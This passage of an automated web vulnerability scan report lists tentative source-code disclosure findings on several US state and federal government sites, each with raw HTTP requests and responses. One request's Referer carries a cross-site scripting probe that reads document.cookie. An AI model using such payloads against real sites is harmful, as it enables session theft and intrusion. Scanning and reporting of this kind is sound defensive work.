<td class="<%=weeks[2].days[0].classname%>"><a href="#"><span><%=weeks[2].days[0].text%></span></a></td>','<td class="<%=weeks[2].days[1].classname%>"><a href="#"><span><%=weeks[2].days[1].text%></span></a></td>','<td class="<%=weeks[2].days[2].classname%>"><a href="#"><span><%=weeks[2].days[2].text%></span></a></td>','<td class="<%=weeks[2].days[3].classname%>"><a href="#"><span><%=weeks[2].days[3].text%></span></a></td>','<td class="<%=weeks[2].days[4].classname%>"><a href="#"><span><%=weeks[2].days[4].text%></span></a></td>','<td class="<%=weeks[2].days[5].classname%>"><a href="#"><span><%=weeks[2].days[5].text%></span></a></td>','<td class="<%=weeks[2].days[6].classname%>"><a href="#"><span><%=weeks[2].days[6].text%></span>
...[SNIP]...
<td class="<%=weeks[3].days[0].classname%>"><a href="#"><span><%=weeks[3].days[0].text%></span></a></td>','<td class="<%=weeks[3].days[1].classname%>"><a href="#"><span><%=weeks[3].days[1].text%></span></a></td>','<td class="<%=weeks[3].days[2].classname%>"><a href="#"><span><%=weeks[3].days[2].text%></span></a></td>','<td class="<%=weeks[3].days[3].classname%>"><a href="#"><span><%=weeks[3].days[3].text%></span></a></td>','<td class="<%=weeks[3].days[4].classname%>"><a href="#"><span><%=weeks[3].days[4].text%></span></a></td>','<td class="<%=weeks[3].days[5].classname%>"><a href="#"><span><%=weeks[3].days[5].text%></span></a></td>','<td class="<%=weeks[3].days[6].classname%>"><a href="#"><span><%=weeks[3].days[6].text%></span>
...[SNIP]...
<td class="<%=weeks[4].days[0].classname%>"><a href="#"><span><%=weeks[4].days[0].text%></span></a></td>','<td class="<%=weeks[4].days[1].classname%>"><a href="#"><span><%=weeks[4].days[1].text%></span></a></td>','<td class="<%=weeks[4].days[2].classname%>"><a href="#"><span><%=weeks[4].days[2].text%></span></a></td>','<td class="<%=weeks[4].days[3].classname%>"><a href="#"><span><%=weeks[4].days[3].text%></span></a></td>','<td class="<%=weeks[4].days[4].classname%>"><a href="#"><span><%=weeks[4].days[4].text%></span></a></td>','<td class="<%=weeks[4].days[5].classname%>"><a href="#"><span><%=weeks[4].days[5].text%></span></a></td>','<td class="<%=weeks[4].days[6].classname%>"><a href="#"><span><%=weeks[4].days[6].text%></span>
...[SNIP]...
<td class="<%=weeks[5].days[0].classname%>"><a href="#"><span><%=weeks[5].days[0].text%></span></a></td>','<td class="<%=weeks[5].days[1].classname%>"><a href="#"><span><%=weeks[5].days[1].text%></span></a></td>','<td class="<%=weeks[5].days[2].classname%>"><a href="#"><span><%=weeks[5].days[2].text%></span></a></td>','<td class="<%=weeks[5].days[3].classname%>"><a href="#"><span><%=weeks[5].days[3].text%></span></a></td>','<td class="<%=weeks[5].days[4].classname%>"><a href="#"><span><%=weeks[5].days[4].text%></span></a></td>','<td class="<%=weeks[5].days[5].classname%>"><a href="#"><span><%=weeks[5].days[5].text%></span></a></td>','<td class="<%=weeks[5].days[6].classname%>"><a href="#"><span><%=weeks[5].days[6].text%></span>
...[SNIP]...
<tbody class="<%=className%>">
...[SNIP]...
<span><%=data[0]%></span>
...[SNIP]...
<span><%=data[1]%></span>
...[SNIP]...
<span><%=data[2]%></span>
...[SNIP]...
<span><%=data[3]%></span>
...[SNIP]...
<span><%=data[4]%></span>
...[SNIP]...
<span><%=data[5]%></span>
...[SNIP]...
<span><%=data[6]%></span>
...[SNIP]...
<span><%=data[7]%></span>
...[SNIP]...
<span><%=data[8]%></span>
...[SNIP]...
<span><%=data[9]%></span>
...[SNIP]...
<span><%=data[10]%></span>
...[SNIP]...
<span><%=data[11]%></span>
...[SNIP]...
){var c=!/\W/.test(e)?b[e]=b[e]||a(document.getElementById(e).innerHTML):new Function("obj","var p=[],print=function(){p.push.apply(p,arguments);};with(obj){p.push('"+e.replace(/[\r\t\n]/g," ").split("<%").join("\t").replace(/((^|%>)[^\t]*)'/g,"$1\r").replace(/\t=(.*?)%>
...[SNIP]...

16.4. https://onestop.michigan.gov/onestop-main/OneStop/js/actionSubmit.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/js/actionSubmit.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /onestop-main/OneStop/js/actionSubmit.js HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/OneStop/ssoNeedPassword.do4c601--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E687572642ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00019ZIYB-FVRKrzIwI-8cI81wk:-D00MP

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: application/x-javascript
date: Sat, 30 Apr 2011 12:27:36 GMT
last-modified: Wed, 16 Mar 2011 20:22:08 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 15048

// Below common script function used to set "action" and "dispatchCommand" to a specific value to execute appropriate menthod in DispatchAction class.
function setAction(ac, method) {
document.f
...[SNIP]...
var answer = "";
if (document.forms[0].answer[0].checked == true) {
answer = "Y";
} else {
answer = "N";
}
document.forms[0].action = "<%=request.getContextPath()%>/BusinessWizController?response=" + answer;
document.forms[0].command.value = "Next";
document.forms[0].submit();
} else {
alert("Please check the Answer YES or NO");

...[SNIP]...

16.5. http://www.archives.gov/includes/javascript/DD_roundies_0.0.2a-min.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.archives.gov
Path:   /includes/javascript/DD_roundies_0.0.2a-min.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /includes/javascript/DD_roundies_0.0.2a-min.js HTTP/1.1
Host: www.archives.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/evetrecs/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:48:22 GMT
Server: Apache
Last-Modified: Tue, 09 Nov 2010 21:23:37 GMT
ETag: "e9484-20dd-5a93e840"
Accept-Ranges: bytes
Content-Length: 8413
Content-Type: application/x-javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.dill
...[SNIP]...
eturn p}('t K={16:\'K\',1L:G,1M:G,1d:G,2f:y(){u(D.2g!=8&&D.1N&&!D.1N[q.16]){q.1L=M;q.1M=M}17 u(D.2g==8){q.1d=M}},2h:D.2i,1O:[],1b:{},2j:y(){u(q.1L||q.1M){D.1N.2L(q.16,\'2M:2N-2O-2P:x\')}u(q.1d){D.2Q(\'<?2R 2S="\'+q.16+\'" 2T="#1P#2k" ?>\')}},2l:y(){t a=D.1k(\'z\');D.2m.1w.1Q(a,D.2m.1w.1w);u(a.12){2n{t b=a.12;b.1x(q.16+\'\\\\:*\',\'{1l:2U(#1P#2k)}\');q.12=b}2o(2p){}}17{q.12=a}},1x:y(a,b,c){u(1R b==\'1S\'||b===2V){b=0}u(b.2W.2q().1y(\'
...[SNIP]...

16.6. http://www.dot.state.tx.us/txdoteforms/GetForm  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.dot.state.tx.us
Path:   /txdoteforms/GetForm

Issue detail

The application appears to disclose some server-side source code written in JSP and ASP.

Request

GET /txdoteforms/GetForm HTTP/1.1
Host: www.dot.state.tx.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:32:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Last-Modified: Fri, 20 Aug 2010 16:31:06 GMT
Content-Length: 2224
Content-Language: en-US
Server: WebSphere Application Server/6.1

<%@ page isErrorPage="true"%>

<html>

<head>
   <title>TxDOT Error Page</title>
   
</head>

<body>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TR>
       <TD><img border="0"
...[SNIP]...
<td>&nbsp;&nbsp;<%= request.getAttribute("datetime")%></td>
...[SNIP]...
<td>&nbsp;&nbsp;<%= request.getAttribute("appid")%></td>
...[SNIP]...
<td>&nbsp;&nbsp;<%= request.getAttribute("formname")%></td>
...[SNIP]...

16.7. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/CMHOM.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Compass.Web/CMHOM.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Connection: keep-alive
Referer: http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:41:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=EN; path=/
Set-Cookie: Image=HomePagePhoto_5.jpg; path=/
Set-Cookie: HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 52074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.8. https://www.humanservices.state.pa.us/Compass.Web/CPACM.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/CPACM.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Compass.Web/CPACM.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=EN; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.9. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/CompassHelpTool.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/MenuItems/CompassHelpTool.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Compass.Web/MenuItems/CompassHelpTool.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 20819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.10. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/LearnAboutCompass.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/MenuItems/LearnAboutCompass.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Compass.Web/MenuItems/LearnAboutCompass.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 58889


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.11. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/OtherLanguage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/MenuItems/OtherLanguage.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Compass.Web/MenuItems/OtherLanguage.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Welome To COMP
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.12. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/SeeAllBenefits.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/MenuItems/SeeAllBenefits.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Compass.Web/MenuItems/SeeAllBenefits.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 28055


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.13. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/SystemCompatibility.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/MenuItems/SystemCompatibility.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Compass.Web/MenuItems/SystemCompatibility.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 32592


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.14. https://www.humanservices.state.pa.us/compass.web/MenuItems/ContactUs.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /compass.web/MenuItems/ContactUs.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /compass.web/MenuItems/ContactUs.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 29112


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
